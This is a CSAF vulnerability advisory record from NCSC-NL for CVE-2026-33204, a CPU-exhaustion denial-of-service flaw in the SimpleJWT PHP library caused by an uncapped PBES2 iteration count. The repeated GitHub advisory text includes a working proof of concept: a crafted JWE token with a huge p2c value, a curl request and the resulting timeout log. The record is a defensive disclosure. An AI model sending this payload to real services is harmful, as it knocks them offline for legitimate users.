{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33204", "tracking": { "current_release_date": "2026-03-29T16:14:34.706964Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33204", "initial_release_date": "2026-03-18T20:44:16.986125Z", "revision_history": [ { "date": "2026-03-18T20:44:16.986125Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-18T20:44:29.750842Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-19T11:39:54.368222Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T23:25:34.645427Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T23:25:38.328274Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-20T23:38:55.185584Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T23:38:59.515140Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-21T15:23:09.187828Z", "number": "8", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-23T12:30:09.470810Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| Product Identifiers created (1).| Product Remediations created (5).| Products created (4).| References created (4).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-23T12:30:14.446811Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:51:26.120573Z", "number": "11", "summary": "Unknown change." }, { "date": "2026-03-25T18:42:07.685126Z", "number": "12", "summary": "References created (2)." }, { "date": "2026-03-25T18:42:10.366665Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:39:38.748570Z", "number": "14", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (42).| Product Identifiers created (41).| References created (3).| CWES updated (1)." }, { "date": "2026-03-26T00:39:43.350529Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-03-29T03:16:22.662720Z", "number": "16", "summary": "References removed (2)." }, { "date": "2026-03-29T16:14:30.178390Z", "number": "17", "summary": "References created (2)." } ], "status": "interim", "version": "17" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5891494" } } ], "category": "product_name", "name": "python-djangorestframework-simplejwt" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5891491" } } ], "category": "product_name", "name": "python3.11-djangorestframework-simplejwt" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5891492" } } ], "category": "product_name", "name": "python3.12-djangorestframework-simplejwt" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5891493" } } ], "category": "product_name", "name": "python3x-djangorestframework-simplejwt" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<1.1.1", "product": { "name": "vers:unknown/<1.1.1", "product_id": "CSAFPID-5878157" } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<1.1.1", "product": { "name": "vers:unknown/>=0|<1.1.1", "product_id": "CSAFPID-5912979" } }, { "category": "product_version_range", "name": "vers:unknown/v0.1.0", "product": { "name": "vers:unknown/v0.1.0", "product_id": "CSAFPID-5912938", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.1.1", "product": { "name": "vers:unknown/v0.1.1", "product_id": "CSAFPID-5912939", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.1.2", "product": { "name": "vers:unknown/v0.1.2", "product_id": "CSAFPID-5912940", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.1.3", "product": { "name": "vers:unknown/v0.1.3", "product_id": "CSAFPID-5912941", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.3" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.1.4", "product": { "name": "vers:unknown/v0.1.4", "product_id": "CSAFPID-5912942", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.4" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.1.5", "product": { "name": "vers:unknown/v0.1.5", "product_id": "CSAFPID-5912943", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.5" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.1.6", "product": { "name": "vers:unknown/v0.1.6", "product_id": "CSAFPID-5912944", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.6" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.2.1", "product": { "name": "vers:unknown/v0.2.1", "product_id": "CSAFPID-5912945", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.2.2", "product": { "name": "vers:unknown/v0.2.2", "product_id": "CSAFPID-5912946", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.2.3", "product": { "name": "vers:unknown/v0.2.3", "product_id": "CSAFPID-5912947", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.3" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.2.4", "product": { "name": "vers:unknown/v0.2.4", "product_id": "CSAFPID-5912948", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.4" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.2.5", "product": { "name": "vers:unknown/v0.2.5", "product_id": "CSAFPID-5912949", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.5" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.3.0", "product": { "name": "vers:unknown/v0.3.0", "product_id": "CSAFPID-5912950", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.3.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.3.1", "product": { "name": "vers:unknown/v0.3.1", "product_id": "CSAFPID-5912951", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.4.0", "product": { "name": "vers:unknown/v0.4.0", "product_id": "CSAFPID-5912952", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.4.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.4.1", "product": { "name": "vers:unknown/v0.4.1", "product_id": "CSAFPID-5912953", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.4.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.4.2", "product": { "name": "vers:unknown/v0.4.2", "product_id": "CSAFPID-5912954", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.4.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.5.0", "product": { "name": "vers:unknown/v0.5.0", "product_id": "CSAFPID-5912955", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.5.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.5.1", "product": { "name": "vers:unknown/v0.5.1", "product_id": "CSAFPID-5912956", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.5.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.5.2", "product": { "name": "vers:unknown/v0.5.2", "product_id": "CSAFPID-5912957", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.5.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.5.3", "product": { "name": "vers:unknown/v0.5.3", "product_id": "CSAFPID-5912958", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.5.3" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.6.0", "product": { "name": "vers:unknown/v0.6.0", "product_id": "CSAFPID-5912959", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.6.0-rc.1", "product": { "name": "vers:unknown/v0.6.0-rc.1", "product_id": "CSAFPID-5912960", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.0-rc.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.6.0-rc.2", "product": { "name": "vers:unknown/v0.6.0-rc.2", "product_id": "CSAFPID-5912961", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.0-rc.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.6.1", "product": { "name": "vers:unknown/v0.6.1", "product_id": "CSAFPID-5912962", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.6.2", "product": { "name": "vers:unknown/v0.6.2", "product_id": "CSAFPID-5912963", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.6.3", "product": { "name": "vers:unknown/v0.6.3", "product_id": "CSAFPID-5912964", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.3" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.7.0", "product": { "name": "vers:unknown/v0.7.0", "product_id": "CSAFPID-5912965", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.7.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.7.1", "product": { "name": "vers:unknown/v0.7.1", "product_id": "CSAFPID-5912966", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.7.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.8.0", "product": { "name": "vers:unknown/v0.8.0", "product_id": "CSAFPID-5912967", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.8.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.8.1", "product": { "name": "vers:unknown/v0.8.1", "product_id": "CSAFPID-5912968", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.8.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.8.2", "product": { "name": "vers:unknown/v0.8.2", "product_id": "CSAFPID-5912969", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.8.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.9.0", "product": { "name": "vers:unknown/v0.9.0", "product_id": "CSAFPID-5912970", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.9.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.9.1", "product": { "name": "vers:unknown/v0.9.1", "product_id": "CSAFPID-5912971", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.9.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.9.2", "product": { "name": "vers:unknown/v0.9.2", "product_id": "CSAFPID-5912972", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.9.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v0.9.3", "product": { "name": "vers:unknown/v0.9.3", "product_id": "CSAFPID-5912973", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v0.9.3" } } }, { "category": "product_version_range", "name": "vers:unknown/v1.0.0", "product": { "name": "vers:unknown/v1.0.0", "product_id": "CSAFPID-5912974", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v1.0.0" } } }, { "category": "product_version_range", "name": "vers:unknown/v1.0.1", "product": { "name": "vers:unknown/v1.0.1", "product_id": "CSAFPID-5912975", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v1.0.1" } } }, { "category": "product_version_range", "name": "vers:unknown/v1.0.2", "product": { "name": "vers:unknown/v1.0.2", "product_id": "CSAFPID-5912976", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v1.0.2" } } }, { "category": "product_version_range", "name": "vers:unknown/v1.0.3", "product": { "name": "vers:unknown/v1.0.3", "product_id": "CSAFPID-5912977", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v1.0.3" } } }, { "category": "product_version_range", "name": "vers:unknown/v1.1.0", "product": { "name": "vers:unknown/v1.1.0", "product_id": "CSAFPID-5912978", "product_identification_helper": { "purl": "pkg:composer/kelvinmo/simplejwt@v1.1.0" } } } ], "category": "product_name", "name": "simplejwt" } ], "category": "vendor", "name": "kelvinmo" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33204", "cwe": { "id": "CWE-325", "name": "Missing Cryptographic Step" }, "notes": [ { "category": "description", "text": "## Summary\n\nAn unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. \nApplications that call `JWE::decrypt()` on attacker-controlled JWEs using PBES2 algorithms are affected.\n\n## Details\n\nPHP version: `PHP 8.4.11`\nSimpleJWT version: `v1.1.0`\n\nThe relevant portion of the vulnerable implementation is shown below ([PBES2.php](https://github.com/kelvinmo/simplejwt/blob/edb7807a240b72c59e72d7dca31add9d16555f9f/src/SimpleJWT/Crypt/KeyManagement/PBES2.php)):\n\n```PHP\n $alg_params */\n static protected $alg_params = [\n 'PBES2-HS256+A128KW' => ['hash' => 'sha256'],\n 'PBES2-HS384+A192KW' => ['hash' => 'sha384'],\n 'PBES2-HS512+A256KW' => ['hash' => 'sha512']\n ];\n\n /** @var truthy-string $hash_alg */\n protected $hash_alg;\n\n /** @var int $iterations */\n protected $iterations = 4096;\n \n /* ... SNIP ... */\n\n /**\n * Sets the number of iterations to use in PBKFD2 key generation.\n *\n * @param int $iterations number of iterations\n * @return void\n */\n public function setIterations(int $iterations) {\n $this->iterations = $iterations;\n }\n \n /* ... SNIP ... */\n\n /**\n * {@inheritdoc}\n */\n public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {\n /** @var SymmetricKey $key */\n $key = $this->selectKey($keys, $kid);\n if ($key == null) {\n throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);\n }\n if (!isset($headers['p2s']) || !isset($headers['p2c'])) {\n throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);\n }\n\n $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);\n return $this->unwrapKey($encrypted_key, $derived_key, $headers);\n }\n \n /* ... SNIP ... */\n\n /**\n * @param array $headers\n */\n private function generateKeyFromPassword(string $password, array $headers): string {\n $salt = $headers['alg'] . \"\\x00\" . Util::base64url_decode($headers['p2s']);\n /** @var int<0, max> $length */\n $length = intdiv($this->getAESKWKeySize(), 8);\n\n return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);\n }\n}\n?>\n```\n\nThe security flaw lies in the lack of input validation when handling JWEs that uses PBES2. \nA \"sanity ceiling\" is not set on the iteration count, which is the parameter known in the JWE specification as `p2c` ([RFC7518](https://datatracker.ietf.org/doc/html/rfc7518#section-4.8.1.2)). \nThe library calls `decryptKey()` with the untrusted input `$headers` which then use the PHP function `hash_pbkdf2()` with the user-supplied value `$headers['p2c']`.\n\nThis results in an algorithmic complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled. \nBecause the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.\n\n## Proof of Concept\n\nSpin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.\n\n```bash\nmkdir simplejwt-poc\ncd simplejwt-poc\ncomposer install\ncomposer require kelvinmo/simplejwt\nphp -S localhost:8000\n```\n\nThe content of `index.php`:\n\n```php\n 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];\n $plaintext = 'This is the plaintext I want to encrypt.';\n $jwe = new SimpleJWT\\JWE($headers, $plaintext);\n\n try {\n echo \"Encrypted JWE: \" . $jwe->encrypt($set);\n } catch (\\RuntimeException $e) {\n echo $e;\n }\n}\n\nelseif ($uri === '/decrypt' && $method === 'GET') {\n try {\n $jwe = $_GET['s'];\n $jwe = SimpleJWT\\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');\n } catch (SimpleJWT\\InvalidTokenException $e) {\n echo $e;\n }\n echo $jwe->getHeader('alg') . \"
\";\n echo $jwe->getHeader('enc') . \"
\";\n echo $jwe->getPlaintext() . \"
\";\n }\n\nelse {\n http_response_code(404);\n echo \"Route not found\";\n}\n\n?>\n```\n\nWe have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):\n\n```json\n{\n \"alg\": \"PBES2-HS256+A128KW\",\n \"enc\": \"A128CBC-HS256\",\n \"p2s\": \"blablabla\",\n \"p2c\": 409123223136\n}\n```\n\nThe final JWE with poisoned header: `eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla`.\n\nNotice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.\n\nPerform the following request to the server (which tries to derive the PBES2 key):\n\n```bash\ncurl --path-as-is -i -s -k -X $'GET' \\\n -H $'Host: localhost:8000' \\\n $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'\n```\n\nThe request blocks the worker until the PHP execution timeout is reached, shutting down the server:\n\n```console\n[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started\n[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted\n\nFatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168\n```\n\n## Impact\n\nAn attacker can send a crafted JWE with an extremely large `p2c` value to force the server to perform a very large number of PBKDF2 iterations. \nThis causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached. \nRepeated requests can exhaust server resources and make the application unavailable to legitimate users.\n\n## Credits \n\nEdoardo Ottavianelli (@edoardottt)", "title": "github - https://github.com/advisories/GHSA-xw36-67f8-339x" }, { "category": "description", "text": "## Summary\n\nAn unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. \nApplications that call `JWE::decrypt()` on attacker-controlled JWEs using PBES2 algorithms are affected.\n\n## Details\n\nPHP version: `PHP 8.4.11`\nSimpleJWT version: `v1.1.0`\n\nThe relevant portion of the vulnerable implementation is shown below ([PBES2.php](https://github.com/kelvinmo/simplejwt/blob/edb7807a240b72c59e72d7dca31add9d16555f9f/src/SimpleJWT/Crypt/KeyManagement/PBES2.php)):\n\n```PHP\n $alg_params */\n static protected $alg_params = [\n 'PBES2-HS256+A128KW' => ['hash' => 'sha256'],\n 'PBES2-HS384+A192KW' => ['hash' => 'sha384'],\n 'PBES2-HS512+A256KW' => ['hash' => 'sha512']\n ];\n\n /** @var truthy-string $hash_alg */\n protected $hash_alg;\n\n /** @var int $iterations */\n protected $iterations = 4096;\n \n /* ... SNIP ... */\n\n /**\n * Sets the number of iterations to use in PBKFD2 key generation.\n *\n * @param int $iterations number of iterations\n * @return void\n */\n public function setIterations(int $iterations) {\n $this->iterations = $iterations;\n }\n \n /* ... SNIP ... */\n\n /**\n * {@inheritdoc}\n */\n public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {\n /** @var SymmetricKey $key */\n $key = $this->selectKey($keys, $kid);\n if ($key == null) {\n throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);\n }\n if (!isset($headers['p2s']) || !isset($headers['p2c'])) {\n throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);\n }\n\n $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);\n return $this->unwrapKey($encrypted_key, $derived_key, $headers);\n }\n \n /* ... SNIP ... */\n\n /**\n * @param array $headers\n */\n private function generateKeyFromPassword(string $password, array $headers): string {\n $salt = $headers['alg'] . \"\\x00\" . Util::base64url_decode($headers['p2s']);\n /** @var int<0, max> $length */\n $length = intdiv($this->getAESKWKeySize(), 8);\n\n return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);\n }\n}\n?>\n```\n\nThe security flaw lies in the lack of input validation when handling JWEs that uses PBES2. \nA \"sanity ceiling\" is not set on the iteration count, which is the parameter known in the JWE specification as `p2c` ([RFC7518](https://datatracker.ietf.org/doc/html/rfc7518#section-4.8.1.2)). \nThe library calls `decryptKey()` with the untrusted input `$headers` which then use the PHP function `hash_pbkdf2()` with the user-supplied value `$headers['p2c']`.\n\nThis results in an algorithmic complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled. \nBecause the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.\n\n## Proof of Concept\n\nSpin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.\n\n```bash\nmkdir simplejwt-poc\ncd simplejwt-poc\ncomposer install\ncomposer require kelvinmo/simplejwt\nphp -S localhost:8000\n```\n\nThe content of `index.php`:\n\n```php\n 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];\n $plaintext = 'This is the plaintext I want to encrypt.';\n $jwe = new SimpleJWT\\JWE($headers, $plaintext);\n\n try {\n echo \"Encrypted JWE: \" . $jwe->encrypt($set);\n } catch (\\RuntimeException $e) {\n echo $e;\n }\n}\n\nelseif ($uri === '/decrypt' && $method === 'GET') {\n try {\n $jwe = $_GET['s'];\n $jwe = SimpleJWT\\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');\n } catch (SimpleJWT\\InvalidTokenException $e) {\n echo $e;\n }\n echo $jwe->getHeader('alg') . \"
\";\n echo $jwe->getHeader('enc') . \"
\";\n echo $jwe->getPlaintext() . \"
\";\n }\n\nelse {\n http_response_code(404);\n echo \"Route not found\";\n}\n\n?>\n```\n\nWe have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):\n\n```json\n{\n \"alg\": \"PBES2-HS256+A128KW\",\n \"enc\": \"A128CBC-HS256\",\n \"p2s\": \"blablabla\",\n \"p2c\": 409123223136\n}\n```\n\nThe final JWE with poisoned header: `eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla`.\n\nNotice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.\n\nPerform the following request to the server (which tries to derive the PBES2 key):\n\n```bash\ncurl --path-as-is -i -s -k -X $'GET' \\\n -H $'Host: localhost:8000' \\\n $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'\n```\n\nThe request blocks the worker until the PHP execution timeout is reached, shutting down the server:\n\n```console\n[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started\n[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted\n\nFatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168\n```\n\n## Impact\n\nAn attacker can send a crafted JWE with an extremely large `p2c` value to force the server to perform a very large number of PBKDF2 iterations. \nThis causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached. \nRepeated requests can exhaust server resources and make the application unavailable to legitimate users.\n\n## Credits \n\nEdoardo Ottavianelli (@edoardottt)", "title": "github - https://api.github.com/advisories/GHSA-xw36-67f8-339x" }, { "category": "description", "text": "SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33204" }, { "category": "description", "text": "SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33204.json" }, { "category": "description", "text": "A flaw was found in SimpleJWT, a PHP library for JSON Web Tokens. An unauthenticated attacker can exploit this vulnerability by tampering with JSON Web Encryption (JWE) headers when Password-Based Key Derivation Function 2 (PBES2) algorithms are in use. This can lead to a Denial of Service (DoS) if an application calls JWE::decrypt() on attacker-controlled JWEs, making the affected application unavailable.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33204.json" }, { "category": "description", "text": "## Summary\n\nAn unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. \nApplications that call `JWE::decrypt()` on attacker-controlled JWEs using PBES2 algorithms are affected.\n\n## Details\n\nPHP version: `PHP 8.4.11`\nSimpleJWT version: `v1.1.0`\n\nThe relevant portion of the vulnerable implementation is shown below ([PBES2.php](https://github.com/kelvinmo/simplejwt/blob/edb7807a240b72c59e72d7dca31add9d16555f9f/src/SimpleJWT/Crypt/KeyManagement/PBES2.php)):\n\n```PHP\n $alg_params */\n static protected $alg_params = [\n 'PBES2-HS256+A128KW' => ['hash' => 'sha256'],\n 'PBES2-HS384+A192KW' => ['hash' => 'sha384'],\n 'PBES2-HS512+A256KW' => ['hash' => 'sha512']\n ];\n\n /** @var truthy-string $hash_alg */\n protected $hash_alg;\n\n /** @var int $iterations */\n protected $iterations = 4096;\n \n /* ... SNIP ... */\n\n /**\n * Sets the number of iterations to use in PBKFD2 key generation.\n *\n * @param int $iterations number of iterations\n * @return void\n */\n public function setIterations(int $iterations) {\n $this->iterations = $iterations;\n }\n \n /* ... SNIP ... */\n\n /**\n * {@inheritdoc}\n */\n public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {\n /** @var SymmetricKey $key */\n $key = $this->selectKey($keys, $kid);\n if ($key == null) {\n throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);\n }\n if (!isset($headers['p2s']) || !isset($headers['p2c'])) {\n throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);\n }\n\n $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);\n return $this->unwrapKey($encrypted_key, $derived_key, $headers);\n }\n \n /* ... SNIP ... */\n\n /**\n * @param array $headers\n */\n private function generateKeyFromPassword(string $password, array $headers): string {\n $salt = $headers['alg'] . \"\\x00\" . Util::base64url_decode($headers['p2s']);\n /** @var int<0, max> $length */\n $length = intdiv($this->getAESKWKeySize(), 